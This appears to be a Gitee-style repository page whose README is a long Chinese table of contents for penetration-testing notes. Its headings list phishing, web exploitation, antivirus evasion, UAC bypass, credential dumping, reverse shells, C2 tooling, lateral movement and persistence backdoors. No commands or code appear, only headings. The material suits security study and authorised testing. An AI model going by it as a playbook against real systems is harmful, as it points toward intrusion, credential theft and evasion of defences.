# Pentest_Note
**Repository Path**: crlwebby/Pentest_Note
## Basic Information
- **Project Name**: Pentest_Note
- **Description**: No description available
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No
## Statistics
- **Stars**: 0
- **Forks**: 0
- **Created**: 2020-10-06
- **Last Updated**: 2024-12-29
## Categories & Tags
**Categories**: Uncategorized
**Tags**: None
## README
* Author:小y
* 公众号:关注安全技术
# Pentest_Note
### 在家无聊总结的,后续会慢慢更新。
### 转载请随意,记得加from
- [信息收集](#信息收集)
- [Whois](#whois)
- [网站IP](#网站ip)
- [是否存在CDN](#是否存在cdn)
- [Bypass cdn常规方式](#bypass-cdn常规方式)
- [域名历史IP](#域名历史ip)
- [网站架构/服务器指纹/CMS识别/容器](#网站架构服务器指纹cms识别容器)
- [子域名](#子域名)
- [网站使用的CMS的官方demo站](#网站使用的cms的官方demo站)
- [SSL证书信息](#ssl证书信息)
- [DNS历史解析记录](#dns历史解析记录)
- [同服站点情况](#同服站点情况)
- [同样架构或源码的站](#同样架构或源码的站)
- [网站js](#网站js)
- [网站使用的第三方js](#网站使用的第三方js)
- [云信息](#云信息)
- [APP反编译](#app反编译)
- [C段/B段信息](#c段b段信息)
- [工具](#工具)
- [端口对外开放情况](#端口对外开放情况)
- [目录扫描/爬虫(慎用)](#目录扫描爬虫慎用)
- [WAF情况识别](#waf情况识别)
- [随手测试](#随手测试)
- [搜索引擎](#搜索引擎)
- [Shodan/fofa/zoomeye](#shodanfofazoomeye)
- [Google dorks](#google-dorks)
- [信息泄露](#信息泄露)
- [网页缓存](#网页缓存)
- [图片反查](#图片反查)
- [社交](#社交)
- [手机号加入通讯录匹配各个APP用户信息](#手机号加入通讯录匹配各个app用户信息)
- [注册过的网站](#注册过的网站)
- [目标人员的兴趣](#目标人员的兴趣)
- [邮箱搜集](#邮箱搜集)
- [Exchange](#exchange)
- [验证邮箱是否存在](#验证邮箱是否存在)
- [历史泄露过的资料等](#历史泄露过的资料等)
- [Github/Gitee等代码托管平台](#githubgitee等代码托管平台)
- [被入侵网址列表](#被入侵网址列表)
- [GPS查询](#gps查询)
- [网站URL提取](#网站url提取)
- [蜜罐判断(参考一下即可)](#蜜罐判断参考一下即可)
- [默认密码](#默认密码)
- [如需注册](#如需注册)
- [企业信息](#企业信息)
- [入口点](#入口点)
- [win10 安装kali(wsl)](#win10-安装kaliwsl)
- [水坑攻击](#水坑攻击)
- [XSS克隆钓鱼](#xss克隆钓鱼)
- [伪造页面钓鱼](#伪造页面钓鱼)
- [1](#1)
- [2](#2)
- [对外服务攻击](#对外服务攻击)
- [Web](#web)
- [前端/逻辑漏洞](#前端逻辑漏洞)
- [注册](#注册)
- [登录](#登录)
- [任意密码重置](#任意密码重置)
- [信息泄露](#信息泄露)
- [后台](#后台)
- [JWT攻击手法](#jwt攻击手法)
- [未校验签名](#未校验签名)
- [禁用哈希](#禁用哈希)
- [暴破弱密钥](#暴破弱密钥)
- [XSS](#xss)
- [CSRF](#csrf)
- [php任意文件读取/下载](#php任意文件读取下载)
- [php文件包含](#php文件包含)
- [常用协议](#常用协议)
- [Getshell](#getshell)
- [allow_url_include 开启时Getshell](#allow_url_include-开启时getshell)
- [allow_url_include 关闭时Getshell](#allow_url_include-关闭时getshell)
- [包含日志文件getshell](#包含日志文件getshell)
- [上传个图片格式的木马直接包含](#上传个图片格式的木马直接包含)
- [限制后缀时](#限制后缀时)
- [phpinfo-LFI 本地文件包含临时文件getshell](#phpinfo-lfi-本地文件包含临时文件getshell)
- [session + lfi getshell](#session--lfi-getshell)
- [LFI SSH Log](#lfi-ssh-log)
- [RFI&命令注入上线MSF](#rfi命令注入上线msf)
- [XML](#xml)
- [XML注入](#xml注入)
- [XXE](#xxe)
- [判断](#判断)
- [挖掘](#挖掘)
- [有回显读取本地文件](#有回显读取本地文件)
- [Blind OOB XXE无回显读取](#blind-oob-xxe无回显读取)
- [列目录](#列目录)
- [不同平台支持的协议](#不同平台支持的协议)
- [执行命令](#执行命令)
- [内网主机探测](#内网主机探测)
- [内网端口扫描](#内网端口扫描)
- [内部DTD利用](#内部dtd利用)
- [Linux](#linux)
- [Windows](#windows)
- [XXE写shell](#xxe写shell)
- [SSRF](#ssrf)
- [定义](#定义)
- [成因](#成因)
- [挖掘](#挖掘)
- [XML](#xml)
- [数据库](#数据库)
- [MongoDB](#mongodb)
- [PostgresSQL](#postgressql)
- [MSSQL](#mssql)
- [图片处理函数](#图片处理函数)
- [攻击](#攻击)
- [文件读取](#文件读取)
- [端口探测](#端口探测)
- [SSRF+Redis](#ssrfredis)
- [302反弹shell](#302反弹shell)
- [Mysql](#mysql)
- [Weblogic SSRF+Redis](#weblogic-ssrfredis)
- [Ueditor SSRF](#ueditor-ssrf)
- [Discuz](#discuz)
- [探测存活主机](#探测存活主机)
- [绕过方法](#绕过方法)
- [gopher协议的脚本转换](#gopher协议的脚本转换)
- [协议](#协议)
- [dict协议写shell](#dict协议写shell)
- [slaveof复制shell到目标](#slaveof复制shell到目标)
- [slaveof反弹shell](#slaveof反弹shell)
- [Fuzz/扫描web ](#fuzz扫描web)
- [WFuzz](#wfuzz)
- [Cewl](#cewl)
- [Dirsearch](#dirsearch)
- [Bypass WAF](#bypass-waf)
- [SQL注入分块传输](#sql注入分块传输)
- [自动提供可用的tamper](#自动提供可用的tamper)
- [垃圾数据](#垃圾数据)
- [上传bypass](#上传bypass)
- [图片文件头](#图片文件头)
- [添加图片头或合并图片包含](#添加图片头或合并图片包含)
- [后缀大小写](#后缀大小写)
- [文件名前缀加[0x09]](#文件名前缀加0x09)
- [上传.htaccess](#上传htaccess)
- [二次渲染](#二次渲染)
- [上传php3,php4,phtml等](#上传php3php4phtml等)
- [文件名后加::$DATA](#文件名后加data)
- [asp . (空格+.)](#asp--空格)
- [php. .(点+空格+点)](#php-点空格点))
- [双写phphpp](#双写phphpp)
- [00截断](#00截断)
- [修改一些固定的参数](#修改一些固定的参数)
- [文件名去掉双引号](#文件名去掉双引号)
- [加一个filename1的参数](#加一个filename1的参数)
- [form变量改成f+orm](#form变量改成form)
- [去掉form-data](#去掉form-data)
- [在Content-Disposition或form-data;后添加多个空格](#在content-disposition或form-data后添加多个空格)
- [引号回车](#引号回车)
- [Content-Type和ConTent-Disposition调换位置](#content-type和content-disposition调换位置)
- [文件名前缀加空格](#文件名前缀加空格)
- [name前加空格](#name前加空格)
- [form-data的前后加上+](#form-data的前后加上)
- [ASP+IIS](#aspiis)
- [Asp+iis&aspx+iis](#aspiisaspxiis)
- [apache](#apache)
- [大小写/关键字](#大小写关键字)
- [双重url编码](#双重url编码)
- [变换请求方式](#变换请求方式)
- [HPP参数污染](#hpp参数污染)
- [数据库](#数据库)
- [Access](#access)
- [Mysql](#mysql)
- [MSSQL](#mssql)
- [WAF](#waf)
- [未授权访问](#未授权访问)
- [Redis未授权访问](#redis未授权访问)
- [测试](#测试)
- [JS打内网](#js打内网)
- [反弹shell](#反弹shell)
- [写shell](#写shell)
- [SSH](#ssh)
- [redis-rogue-getshell](#redis-rogue-getshell)
- [redis-rogue-server](#redis-rogue-server)
- [redis在windows下的利用](#redis在windows下的利用)
- [Lua RCE](#lua-rce)
- [Jenkins未授权访问](#jenkins未授权访问)
- [MongoDB未授权访问](#mongodb未授权访问)
- [ZooKeeper未授权访问](#zookeeper未授权访问)
- [Elasticsearch未授权访问](#elasticsearch未授权访问)
- [Memcache未授权访问](#memcache未授权访问)
- [Hadoop未授权访问](#hadoop未授权访问)
- [Docker未授权访问](#docker未授权访问)
- [ActiveMQ未授权访问](#activemq未授权访问)
- [阿里云OSS Key利用](#阿里云oss-key利用)
- [Linux绕过disable_function](#linux绕过disable_function)
- [LD_PRELOAD](#ld_preload)
- [php7.0-7.3 bypass](#php70-73-bypass)
- [windows系统组件com绕过](#windows系统组件com绕过)
- [CGI启动方式](#cgi启动方式)
- [ImageMagick组件绕过](#imagemagick组件绕过)
- [常规函数绕过](#常规函数绕过)
- [pcntl_exec](#pcntl_exec)
- [imap_open函数](#imap_open函数)
- [php7.4 FFI绕过](#php74-ffi绕过)
- [shellshock](#shellshock)
- [蚁剑插件](#蚁剑插件)
- [open_basedir绕过](#open_basedir绕过)
- [Tomcat Ajp LFI&RCE ](#tomcat-ajp-lfirce)
- [Mysql连接文件读取](#mysql连接文件读取)
- [Mysql开启外连](#mysql开启外连)
- [MSSQL&Agent Job上线](#mssqlagent-job上线)
- [注入无列名](#注入无列名)
- [DNSLog](#dnslog)
- [注入](#注入)
- [MYSQL](#mysql)
- [MSSQL](#mssql)
- [postgreSQL](#postgresql)
- [Oracle](#oracle)
- [命令执行](#命令执行)
- [XXE](#xxe)
- [Struts](#struts)
- [weblogic](#weblogic)
- [Resin](#resin)
- [Discuz](#discuz)
- [PHPMyadmin](#phpmyadmin)
- [LOG](#log)
- [慢查询](#慢查询)
- [任意文件读取](#任意文件读取)
- [LFI](#lfi)
- [RCE](#rce)
- [PHP-FPM RCE](#php-fpm-rce)
- [phpstudy后门](#phpstudy后门)
- [cmdhijack](#cmdhijack)
- [Database](#database)
- [MSSQL](#mssql)
- [PostgreSQL](#postgresql)
- [近源攻击](#近源攻击)
- [WI-FI破解](#wi-fi破解)
- [wifite](#wifite)
- [Aircrack-ng](#aircrack-ng)
- [钓鱼网络](#钓鱼网络)
- [Hostapd](#hostapd)
- [Hostapd-wpe](#hostapd-wpe)
- [无线干扰](#无线干扰)
- [Beacon flood](#beacon-flood)
- [Deauth flood](#deauth-flood)
- [Mdk3 destruction](#mdk3-destruction)
- [WiFi芯片esp8266](#wifi芯片esp8266)
- [Mdk4](#mdk4)
- [CVE-2018-4407](#cve-2018-4407)
- [绕过mac地址认证](#绕过mac地址认证)
- [Ifconfig](#ifconfig)
- [Macchanger](#macchanger)
- [BadUSB](#badusb)
- [克隆卡](#克隆卡)
- [蓝牙](#蓝牙)
- [鱼叉式攻击](#鱼叉式攻击)
- [钓鱼邮件](#钓鱼邮件)
- [CVE](#cve)
- [CVE-2017-11882](#cve-2017-11882)
- [CVE-2017-0199](#cve-2017-0199)
- [CVE-2012-0158](#cve-2012-0158)
- [CVE-2017-0143](#cve-2017-0143)
- [可执行文件](#可执行文件)
- [文档文件的伪造](#文档文件的伪造)
- [扩展名/图标](#扩展名图标)
- [捆绑](#捆绑)
- [宏](#宏)
- [0day](#0day)
- [CHM](#chm)
- [钓鱼链接](#钓鱼链接)
- [URL跳转](#url跳转)
- [结合恶意文档或程序](#结合恶意文档或程序)
- [短URL](#短url)
- [结合水坑攻击](#结合水坑攻击)
- [相似域名](#相似域名)
- [域名窃取](#域名窃取)
- [第三方服务鱼叉](#第三方服务鱼叉)
- [免杀](#免杀)
- [MSF免杀](#msf免杀)
- [nps_payload](#nps_payload)
- [编码器](#编码器)
- [c/c++源码免杀](#cc源码免杀)
- [指针执行](#指针执行)
- [申请动态内存](#申请动态内存)
- [嵌入汇编](#嵌入汇编)
- [强制类型转换](#强制类型转换)
- [汇编花指令](#汇编花指令)
- [XOR加密](#xor加密)
- [远程线程注入](#远程线程注入)
- [加载器免杀](#加载器免杀)
- [shellcode_launcher](#shellcode_launcher)
- [SSI加载](#ssi加载)
- [c#源码免杀](#c源码免杀)
- [直接编译](#直接编译)
- [加密处理](#加密处理)
- [XOR/AES编码](#xoraes编码)
- [CSC+InstallUtil](#cscinstallutil)
- [Python源码免杀](#python源码免杀)
- [pyinstaller加载C代码编译](#pyinstaller加载c代码编译)
- [pyinstaller加载py代码编译(*)](#pyinstaller加载py代码编译)
- [Py2exe打包exe](#py2exe打包exe)
- [Base64编码+Pyinstaller打包](#base64编码pyinstaller打包)
- [加载器分离](#加载器分离)
- [hex](#hex)
- [Base64(*)](#base64)
- [DLL劫持](#dll劫持)
- [MSBuild](#msbuild)
- [GreatSCT](#greatsct)
- [Mshta](#mshta)
- [InstallUtil](#installutil)
- [Veil](#veil)
- [RC4](#rc4)
- [捆绑](#捆绑)
- [Evasion模块](#evasion模块)
- [Phantom-Evasion](#phantom-evasion)
- [Shellter](#shellter)
- [the-backdoor-factory](#the-backdoor-factory)
- [zirikatu](#zirikatu)
- [hanzoInjection](#hanzoinjection)
- [PowerShell免杀](#powershell免杀)
- [直接生成](#直接生成)
- [分块免杀](#分块免杀)
- [Invoke-Shellcode加载](#invoke-shellcode加载)
- [Invoke-Obfuscation](#invoke-obfuscation)
- [Xencrypt](#xencrypt)
- [PyFuscation](#pyfuscation)
- [拆分+C编译](#拆分c编译)
- [行为检测](#行为检测)
- [Out-EncryptedScript](#out-encryptedscript)
- [cobalt strike powershell免杀](#cobalt-strike-powershell免杀)
- [Ruby](#ruby)
- [Golang](#golang)
- [加载器](#加载器)
- [go-shellcode](#go-shellcode)
- [Gsl](#gsl)
- [内网&域](#内网域)
- [Powershell](#powershell)
- [远程执行](#远程执行)
- [加载exe](#加载exe)
- [EXE2PS1](#exe2ps1)
- [绕过策略](#绕过策略)
- [Base64](#base64)
- [写入bat绕过](#写入bat绕过)
- [拼接拆分字符串](#拼接拆分字符串)
- [Replace替换函数](#replace替换函数)
- [HTTP字符拼接绕过](#http字符拼接绕过)
- [图片免杀](#图片免杀)
- [加载shellcode](#加载shellcode)
- [加载dll](#加载dll)
- [Windows安全标识符(SID)](#windows安全标识符sid)
- [提权](#提权)
- [Impacket工具包](#impacket工具包)
- [Windows-exploit-suggester](#windows-exploit-suggester)
- [Wesng](#wesng)
- [Searchsploit](#searchsploit)
- [激活guest](#激活guest)
- [MYSQL udf](#mysql-udf)
- [MYSQL Linux Root](#mysql-linux-root)
- [MSSQL](#mssql)
- [xp_cmdshell](#xp_cmdshell)
- [xp_regwrite](#xp_regwrite)
- [xp_dirtree](#xp_dirtree)
- [sp_oacreate](#sp_oacreate)
- [沙盒执行](#沙盒执行)
- [WarSQLKit(后门)](#warsqlkit后门)
- [MSF](#msf)
- [Bypass UAC](#bypass-uac)
- [MSF](#msf)
- [DccwBypassUAC](#dccwbypassuac)
- [K8uac](#k8uac)
- [CMSTP](#cmstp)
- [Uacme](#uacme)
- [Bypass-UAC](#bypass-uac)
- [DLL hijack](#dll-hijack)
- [SilentCleanup](#silentcleanup)
- [Sdclt](#sdclt)
- [1](#1)
- [2](#2)
- [Makecab&Wusa](#makecabwusa)
- [CLR BypassUAC](#clr-bypassuac)
- [eventvwr劫持注册表](#eventvwr劫持注册表)
- [Web Delivery](#web-delivery)
- [Invoke-PsUACme](#invoke-psuacme)
- [Whitelist(白名单)](#whitelist白名单)
- [GreatSCT](#greatsct)
- [JSRat](#jsrat)
- [Odbcconf.exe](#odbcconfexe)
- [Msiexec.exe](#msiexecexe)
- [InstallUtil.exe](#installutilexe)
- [Compiler.exe](#compilerexe)
- [1.xml](#1xml)
- [1.tcp](#1tcp)
- [Csc](#csc)
- [Regasm](#regasm)
- [Msbuild](#msbuild)
- [Winrm](#winrm)
- [Mshta](#mshta)
- [Regsvr32](#regsvr32)
- [Rundll32](#rundll32)
- [执行文件](#执行文件)
- [无弹窗执行](#无弹窗执行)
- [增删注册表](#增删注册表)
- [写文件](#写文件)
- [Out-RundllCommand](#out-rundllcommand)
- [DotNetToJScript](#dotnettojscript)
- [StarFighters](#starfighters)
- [绕过AMSI执行](#绕过amsi执行)
- [WMIC](#wmic)
- [Msxsl](#msxsl)
- [CPL](#cpl)
- [Runas](#runas)
- [令牌窃取](#令牌窃取)
- [MSF](#msf)
- [Cobalt strike](#cobalt-strike)
- [密码窃取](#密码窃取)
- [伪造锁屏](#伪造锁屏)
- [伪造认证框](#伪造认证框)
- [CredsLeaker](#credsleaker)
- [LoginPrompt](#loginprompt)
- [Nishang-Invoke-CredentialsPhish](#nishang-invoke-credentialsphish)
- [RottenPotato](#rottenpotato)
- [PowerUp](#powerup)
- [Powerup-AlwaysInstallElevated](#powerup-alwaysinstallelevated)
- [AlwaysInstallElevated提权](#alwaysinstallelevated提权)
- [Trusted Service Paths](#trusted-service-paths)
- [Vulnerable Services](#vulnerable-services)
- [Sudo提权](#sudo提权)
- [Linux计划任务](#linux计划任务)
- [Linux SUID提权](#linux-suid提权)
- [Find](#find)
- [NMAP](#nmap)
- [VIM](#vim)
- [BASH](#bash)
- [CP/MV](#cpmv)
- [Linux /etc/passwd提权](#linux-etcpasswd提权)
- [Linux脏牛提权](#linux脏牛提权)
- [RDP&Fireawall](#rdpfireawall)
- [爆破](#爆破)
- [注册表开启](#注册表开启)
- [NETSH启动服务](#netsh启动服务)
- [注入点开启](#注入点开启)
- [MSF开启](#msf开启)
- [Wmic开启](#wmic开启)
- [防火墙](#防火墙)
- [多用户登录](#多用户登录)
- [RDP连接记录](#rdp连接记录)
- [删除痕迹](#删除痕迹)
- [端口映射&转发](#端口映射转发)
- [MSF](#msf)
- [lcx.exe](#lcxexe)
- [SSH](#ssh)
- [正向转发](#正向转发)
- [反向转发](#反向转发)
- [Invoke-SocksProxy](#invoke-socksproxy)
- [SSF](#ssf)
- [单层网络正向转发](#单层网络正向转发)
- [单层网络反向转发](#单层网络反向转发)
- [Netsh](#netsh)
- [Iptables](#iptables)
- [chisel ](#chisel)
- [命令&控制](#命令控制)
- [Interactive shell](#interactive-shell)
- [Script reverse shell](#script-reverse-shell)
- [bash](#bash)
- [nc](#nc)
- [telnet](#telnet)
- [php](#php)
- [python](#python)
- [perl](#perl)
- [ruby](#ruby)
- [OpenSSL encrypt shell](#openssl-encrypt-shell)
- [Linux](#linux)
- [Windows](#windows)
- [Dnscat2](#dnscat2)
- [Powercat](#powercat)
- [Dnscat2 exe](#dnscat2-exe)
- [DNS TXT Command](#dns-txt-command)
- [Powershell](#powershell)
- [MSF+Powershell](#msfpowershell)
- [Powercat](#powercat)
- [Nishang](#nishang)
- [Bind shell](#bind-shell)
- [反向shell](#反向shell)
- [UDP反向shell](#udp反向shell)
- [HTTPS](#https)
- [ICMP](#icmp)
- [Base64](#base64)
- [Metasploit](#metasploit)
- [常规使用](#常规使用)
- [技巧使用](#技巧使用)
- [模块](#模块)
- [Auxiliary](#auxiliary)
- [Payload](#payload)
- [Windows](#windows)
- [Linux](#linux)
- [MacOS](#macos)
- [Web](#web)
- [Android](#android)
- [shellcode](#shellcode)
- [msf设置监听](#msf设置监听)
- [Meterpreter](#meterpreter)
- [交互](#交互)
- [提权](#提权)
- [命令](#命令)
- [文件操作](#文件操作)
- [后渗透&权限维持](#后渗透权限维持)
- [清理日志](#清理日志)
- [MSF派生Cobalt strike和Empire](#msf派生cobalt-strike和empire)
- [派生Empire](#派生empire)
- [派生Cobalt Strike](#派生cobalt-strike)
- [Empire](#empire)
- [安装](#安装)
- [监听](#监听)
- [生成](#生成)
- [连接靶机及其他操作](#连接靶机及其他操作)
- [提权](#提权)
- [横向](#横向)
- [令牌窃取](#令牌窃取)
- [会话注入](#会话注入)
- [Hash传递](#hash传递)
- [后门&持久化](#后门持久化)
- [映像劫持](#映像劫持)
- [注入注册表启动项](#注入注册表启动项)
- [计划任务](#计划任务)
- [WMI](#wmi)
- [注入SSP](#注入ssp)
- [Collection(信息采集)](#collection信息采集)
- [Code_execution(代码执行)](#code_execution代码执行)
- [Credentials(身份凭证)](#credentials身份凭证)
- [Exfiltration(数据窃取)](#exfiltration数据窃取)
- [Exploitation(漏洞利用EXP)](#exploitation漏洞利用exp)
- [Lateral_movement(横向移动)](#lateral_movement横向移动)
- [Management(管理)](#management管理)
- [Persistence(持久化)](#persistence持久化)
- [Privesc(权限提升)](#privesc权限提升)
- [Recon(侦察)](#recon侦察)
- [Situational_awareness(态势感知)](#situational_awareness态势感知)
- [Trollsploit(恶作剧)](#trollsploit恶作剧)
- [Empire Word](#empire-word)
- [Empire派生Cobalt Strike和MSF](#empire派生cobalt-strike和msf)
- [派生MSF](#派生msf)
- [派生Cobalt Strike](#派生cobalt-strike)
- [Cobalt Strike](#cobalt-strike)
- [安装](#安装)
- [部署TeamServer](#部署teamserver)
- [模块](#模块)
- [连接](#连接)
- [监听器](#监听器)
- [攻击模块](#攻击模块)
- [视图模块](#视图模块)
- [交互](#交互)
- [Beacon](#beacon)
- [克隆网站](#克隆网站)
- [office宏](#office宏)
- [钓鱼邮件](#钓鱼邮件)
- [加载脚本](#加载脚本)
- [浏览器劫持](#浏览器劫持)
- [权限维持](#权限维持)
- [横向](#横向)
- [隔离网络](#隔离网络)
- [权限机中转](#权限机中转)
- [SMB_beacon](#smb_beacon)
- [SSH login](#ssh-login)
- [代理](#代理)
- [部署VPN](#部署vpn)
- [Cobalt strike派生 Empire和MSF](#cobalt-strike派生-empire和msf)
- [派生Empire](#派生empire)
- [派生MSF](#派生msf)
- [JSRat](#jsrat)
- [CrackMapExec](#crackmapexec)
- [信息收集](#信息收集)
- [爆破](#爆破)
- [可用模块](#可用模块)
- [PTH](#pth)
- [执行命令](#执行命令)
- [koadic](#koadic)
- [SILENTTRINITY](#silenttrinity)
- [Browser C2](#browser-c2)
- [DropBox C2](#dropbox-c2)
- [Gmail C2](#gmail-c2)
- [Gcat](#gcat)
- [Gdog](#gdog)
- [Telegram C2](#telegram-c2)
- [信息收集](#信息收集)
- [Cmd](#cmd)
- [Wmi](#wmi)
- [PowerView](#powerview)
- [Linux](#linux)
- [HTTP服务](#http服务)
- [文件操作](#文件操作)
- [Windows查找文件](#windows查找文件)
- [Linux查找文件](#linux查找文件)
- [创建](#创建)
- [压缩](#压缩)
- [解压](#解压)
- [传输](#传输)
- [FTP](#ftp)
- [VBS](#vbs)
- [JS](#js)
- [Bitsadmin](#bitsadmin)
- [Powershell ](#powershell)
- [1](#1)
- [2](#2)
- [3](#3)
- [4](#4)
- [5](#5)
- [Certutil](#certutil)
- [Python](#python)
- [Perl](#perl)
- [PHP](#php)
- [Curl](#curl)
- [wget](#wget)
- [nc ](#nc)
- [SCP](#scp)
- [Hash&密码](#hash密码)
- [破解网址](#破解网址)
- [GoogleColab破解hash](#googlecolab破解hash)
- [密码策略](#密码策略)
- [开启Wdigest ](#开启wdigest)
- [Cmd](#cmd)
- [powershell](#powershell)
- [meterpreter](#meterpreter)
- [Getpass](#getpass)
- [QuarksPwDump](#quarkspwdump)
- [MSF](#msf)
- [Empire](#empire)
- [Invoke-Dcsync](#invoke-dcsync)
- [Mimikatz](#mimikatz)
- [调用mimikatz远程抓取](#调用mimikatz远程抓取)
- [横向批量抓hash](#横向批量抓hash)
- [Schtasks](#schtasks)
- [Wmic](#wmic)
- [直接使用](#直接使用)
- [Powershell Bypass](#powershell-bypass)
- [.net 2.0](#net-20)
- [.net 4.0 Msbuild](#net-40-msbuild)
- [JScript](#jscript)
- [Procdump64+mimikatz](#procdump64mimikatz)
- [Dumpert](#dumpert)
- [Cisco Jabber转储lsass](#cisco-jabber转储lsass)
- [绕过卡巴斯基](#绕过卡巴斯基)
- [远程LSASS进程转储-Physmem2profit](#远程lsass进程转储-physmem2profit)
- [SqlDumper+mimikatz](#sqldumpermimikatz)
- [Mimipenguin](#mimipenguin)
- [缓存hash提取](#缓存hash提取)
- [注册表](#注册表)
- [Ninjacopy](#ninjacopy)
- [Quarks-pwdump](#quarks-pwdump)
- [域hash提取](#域hash提取)
- [Ntdsutil](#ntdsutil)
- [Vssadmin](#vssadmin)
- [Impacket](#impacket)
- [NTDSDumpex](#ntdsdumpex)
- [WMI调用Vssadmin](#wmi调用vssadmin)
- [PowerSploit](#powersploit)
- [Nishang](#nishang)
- [Mimikatz](#mimikatz)
- [MSF](#msf)
- [laZagne](#lazagne)
- [windows](#windows)
- [Linux](#linux)
- [敏感信息](#敏感信息)
- [Seatbelt](#seatbelt)
- [VNC密码](#vnc密码)
- [Navicat信息](#navicat信息)
- [Chrome保存的密码](#chrome保存的密码)
- [Foxmail](#foxmail)
- [firefox保存的密码](#firefox保存的密码)
- [SecureCRT](#securecrt)
- [横向](#横向)
- [探测存活主机](#探测存活主机)
- [For+Ping命令查询存活主机](#forping命令查询存活主机)
- [NbtScan](#nbtscan)
- [NMAP](#nmap)
- [代理nmap扫描](#代理nmap扫描)
- [NetDiscover](#netdiscover)
- [rp-scan](#rp-scan)
- [MSF](#msf)
- [探测服务&端口](#探测服务端口)
- [Powershell](#powershell)
- [Powersploit](#powersploit)
- [Nishang ](#nishang)
- [SMB ](#smb)
- [MSF](#msf)
- [NMAP](#nmap)
- [CMD](#cmd)
- [Linux Samba服务](#linux-samba服务)
- [MSF](#msf)
- [端口](#端口)
- [服务](#服务)
- [Nc](#nc)
- [Masscan](#masscan)
- [PTScan](#ptscan)
- [CobaltStrike+K8 Aggressor](#cobaltstrikek8-aggressor)
- [存活主机](#存活主机)
- [MS17010](#ms17010)
- [操作系统信息](#操作系统信息)
- [内网站点banner、标题扫描](#内网站点banner标题扫描)
- [FTP爆破](#ftp爆破)
- [WMI爆破windows账户密码](#wmi爆破windows账户密码)
- [思科设备扫描](#思科设备扫描)
- [枚举共享](#枚举共享)
- [枚举SQL SERVER数据库](#枚举sql-server数据库)
- [执行命令&IPC&计划任务](#执行命令ipc计划任务)
- [AT](#at)
- [Schtasks](#schtasks)
- [WMIC](#wmic)
- [快速定位域管理登过的机器](#快速定位域管理登过的机器)
- [MSF添加路由](#msf添加路由)
- [MSF管道监听](#msf管道监听)
- [代理](#代理)
- [SSH](#ssh)
- [正向代理](#正向代理)
- [反向代理](#反向代理)
- [SSH隧道+rc4双重加密](#ssh隧道rc4双重加密)
- [公网SSH隧道+Local MSF](#公网ssh隧道local-msf)
- [socks4a](#socks4a)
- [socks5](#socks5)
- [基于web的socks5 ](#基于web的socks5)
- [reGeorg](#regeorg)
- [Neo-reGeorg](#neo-regeorg)
- [ABPTTS端口转发](#abptts端口转发)
- [Tunna转发](#tunna转发)
- [Earthworm](#earthworm)
- [正向(目标机存在外网IP):](#正向目标机存在外网ip)
- [反弹socks5(目标机无外网IP):](#反弹socks5目标机无外网ip)
- [二级环境(A有外网,B内网无外网):](#二级环境a有外网b内网无外网)
- [二级环境(A无外网,B内网无外网):](#二级环境a无外网b内网无外网)
- [三级环境(A无外网,B内网无外网通A,C通B):](#三级环境a无外网b内网无外网通ac通b)
- [Frp ](#frp)
- [SSF](#ssf)
- [正向socks代理](#正向socks代理)
- [反向socks代理](#反向socks代理)
- [多级级联](#多级级联)
- [反弹shell](#反弹shell)
- [Shadowsocks](#shadowsocks)
- [Goproxy](#goproxy)
- [Chisel](#chisel)
- [代理软件](#代理软件)
- [Ngrok内网穿透](#ngrok内网穿透)
- [MS17-010](#ms17-010)
- [MS08_067](#ms08_067)
- [攻击MySQL数据库](#攻击mysql数据库)
- [攻击MSSQL数据库](#攻击mssql数据库)
- [隔离主机payload](#隔离主机payload)
- [爆破](#爆破)
- [Hydra](#hydra)
- [Medusa](#medusa)
- [域内爆破](#域内爆破)
- [Kerbrute](#kerbrute)
- [DomainPasswordSpray](#domainpasswordspray)
- [方程式内网不产生session](#方程式内网不产生session)
- [Kerberoasting](#kerberoasting)
- [SPN发现](#spn发现)
- [cmd](#cmd)
- [Powershell](#powershell)
- [Empire](#empire)
- [申请票据](#申请票据)
- [导出票据](#导出票据)
- [破解密码](#破解密码)
- [重写票据](#重写票据)
- [GetUserSPNs](#getuserspns)
- [ASEPRoasting](#aseproasting)
- [PASS-THE-HASH](#pass-the-hash)
- [WMIExec & TheHash](#wmiexec--thehash)
- [WMI](#wmi)
- [wmiexec.py](#wmiexecpy)
- [wmiexec.vbs](#wmiexecvbs)
- [Powershell](#powershell)
- [Psexec](#psexec)
- [Mimikatz](#mimikatz)
- [pth-winexe](#pth-winexe)
- [Smbexec](#smbexec)
- [PASS-THE-TICKET](#pass-the-ticket)
- [名词](#名词)
- [黄金票据+Mimikatz](#黄金票据mimikatz)
- [白银票据+Mimikatz](#白银票据mimikatz)
- [MS14-068](#ms14-068)
- [Mimikatz+MSF](#mimikatzmsf)
- [goldenPac.py](#goldenpacpy)
- [账户委派](#账户委派)
- [账户非受限委派](#账户非受限委派)
- [账户受限委派](#账户受限委派)
- [资源受限委派](#资源受限委派)
- [CVE-2019-0708](#cve-2019-0708)
- [NTLM中继](#ntlm中继)
- [Ntlmrelayx+资源受限委派](#ntlmrelayx资源受限委派)
- [Responder](#responder)
- [SMB协议截获](#smb协议截获)
- [WPAD代理欺骗](#wpad代理欺骗)
- [Web漏洞](#web漏洞)
- [中继攻击](#中继攻击)
- [NTLMv2Hash破解](#ntlmv2hash破解)
- [GPP-Password](#gpp-password)
- [WinRM无文件执行](#winrm无文件执行)
- [添加域管命令](#添加域管命令)
- [SSH密钥免密登录](#ssh密钥免密登录)
- [获取保存的RDP密码](#获取保存的rdp密码)
- [后门&持久化](#后门持久化)
- [影子用户](#影子用户)
- [RID劫持](#rid劫持)
- [Guest激活](#guest激活)
- [映像劫持](#映像劫持)
- [Sethc](#sethc)
- [轻松使用](#轻松使用)
- [IFEO静默执行](#ifeo静默执行)
- [注册表启动项](#注册表启动项)
- [MSF](#msf)
- [CMD](#cmd)
- [计划任务](#计划任务)
- [加载powershell](#加载powershell)
- [执行exe](#执行exe)
- [进程注入](#进程注入)
- [AppCertDlls](#appcertdlls)
- [AppInit_DLLs](#appinit_dlls)
- [MSF](#msf)
- [登录初始化](#登录初始化)
- [屏幕保护程序](#屏幕保护程序)
- [MOF](#mof)
- [WinRM端口复用](#winrm端口复用)
- [创建服务](#创建服务)
- [Bitadmin](#bitadmin)
- [CLR Injection](#clr-injection)
- [COM OBJECT hijacking](#com-object-hijacking)
- [CAccPropServicesClass and MMDeviceEnumerato](#caccpropservicesclass-and-mmdeviceenumerato)
- [Explorer](#explorer)
- [Squibledoo](#squibledoo)
- [DLL劫持](#dll劫持)
- [劫持1](#劫持1)
- [劫持2](#劫持2)
- [MSDTC服务劫持](#msdtc服务劫持)
- [Rattler](#rattler)
